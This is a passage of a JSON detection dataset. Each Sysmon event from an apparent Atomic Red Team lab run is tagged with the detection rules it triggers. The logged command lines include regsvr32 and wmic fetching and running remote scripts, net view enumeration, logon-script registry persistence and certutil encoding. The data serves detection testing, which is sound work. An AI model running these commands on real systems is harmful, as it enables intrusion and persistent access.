/FORMAT:list\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8CF-5D31-0000-00109B603300","ParentProcessId":5380,"ProcessGuid":"747F3D96-D8D0-5D31-0000-0010F3623300","ProcessId":7040,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:50:56.021"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3763,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:56.047770Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing","SquiblyTwo"],"event":{"Event":{"EventData":{"CommandLine":"wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"WMI Commandline Utility","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8DA-5D31-0000-0010D3833300","ParentProcessId":5340,"ProcessGuid":"747F3D96-D8DA-5D31-0000-001029863300","ProcessId":3220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:51:06.748"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3766,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:51:06.753240Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Net.exe Execution","Windows Network Enumeration"],"event":{"Event":{"EventData":{"CommandLine":"net view /domain","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Net Command","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"net view /domain\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8DD-5D31-0000-0010EF923300","ParentProcessId":4856,"ProcessGuid":"747F3D96-D8DD-5D31-0000-001043953300","ProcessId":3012,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:51:09.839"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3769,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:51:09.845415Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Net.exe Execution","Windows Network Enumeration"],"event":{"Event":{"EventData":{"CommandLine":"net view","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Net Command","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"net view\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8EA-5D31-0000-001030B63300","ParentProcessId":1988,"ProcessGuid":"747F3D96-D8EA-5D31-0000-00108AB83300","ProcessId":4684,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:51:22.330"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3771,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:51:22.333688Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D976-5D31-0000-001041E83700","ParentProcessId":4444,"ProcessGuid":"747F3D96-D976-5D31-0000-001093EA3700","ProcessId":2332,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:42.834"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4033,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:42.841951Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"Windows ® Script Component Runtime","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5B139E692D2A376CCA16D536612EF87AD946EC6B,MD5=3F4DB17E9534DB1CEDA28FF77C27F535,SHA256=14A2C790E3E82DAF7918B61AB79F84228E7CA4494F5C2D311A1179CCA67B02C2,IMPHASH=C928D4D30D6B6FC0A3B011AA381044CA","Image":"C:\\Windows\\System32\\regsvr32.exe","ImageLoaded":"C:\\Windows\\System32\\scrobj.dll","ProcessGuid":"747F3D96-D976-5D31-0000-001093EA3700","ProcessId":2332,"Product":"Microsoft ® Windows ® Script Component Runtime","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-07-19 14:53:42.961"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4034,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:42.964349Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-D976-5D31-0000-001093EA3700","ParentProcessId":2332,"ProcessGuid":"747F3D96-D977-5D31-0000-00100A0E3800","ProcessId":3848,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:43.339"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4035,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:43.445040Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D978-5D31-0000-0010442F3800","ParentProcessId":2832,"ProcessGuid":"747F3D96-D978-5D31-0000-0010EB313800","ProcessId":2076,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:44.049"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4038,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:44.054072Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"Windows ® Script Component Runtime","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5B139E692D2A376CCA16D536612EF87AD946EC6B,MD5=3F4DB17E9534DB1CEDA28FF77C27F535,SHA256=14A2C790E3E82DAF7918B61AB79F84228E7CA4494F5C2D311A1179CCA67B02C2,IMPHASH=C928D4D30D6B6FC0A3B011AA381044CA","Image":"C:\\Windows\\System32\\regsvr32.exe","ImageLoaded":"C:\\Windows\\System32\\scrobj.dll","ProcessGuid":"747F3D96-D978-5D31-0000-0010EB313800","ProcessId":2076,"Product":"Microsoft ® Windows ® Script Component Runtime","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-07-19 14:53:44.103"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4039,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:44.117123Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-D978-5D31-0000-0010EB313800","ParentProcessId":2076,"ProcessGuid":"747F3D96-D97A-5D31-0000-00105DA83800","ProcessId":4336,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:46.135"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4041,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:46.204886Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\syswow64\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8","Image":"C:\\Windows\\SysWOW64\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D97A-5D31-0000-00109DDC3800","ProcessId":3564,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:46.831"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4044,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:46.848703Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D97A-5D31-0000-001019DE3800","ProcessId":5828,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:46.867"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4045,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:46.893188Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8","Image":"C:\\Windows\\SysWOW64\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-D97A-5D31-0000-001019DE3800","ParentProcessId":5828,"ProcessGuid":"747F3D96-D97B-5D31-0000-00109DEB3800","ProcessId":5788,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:47.056"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4047,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:47.083068Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Logon Scripts (UserInitMprLogonScript)"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d \" cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D982-5D31-0000-0010DC633900","ProcessId":4240,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:54.968"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4049,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:54.976854Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Logon Scripts (UserInitMprLogonScript)"],"event":{"Event":{"EventData":{"CommandLine":"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d \" cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D982-5D31-0000-0010DC633900","ParentProcessId":4240,"ProcessGuid":"747F3D96-D983-5D31-0000-00102E663900","ProcessId":3608,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:55.010"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4050,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:55.018275Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","OceanLotus Registry Activity","Logon Scripts (UserInitMprLogonScript) Registry","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D983-5D31-0000-00102E663900","ProcessId":3608,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\UserInitMprLogonScript","UtcTime":"2019-07-19 14:54:01.900"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4051,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:54:01.925833Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -encode c:\\file.exe file.txt\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 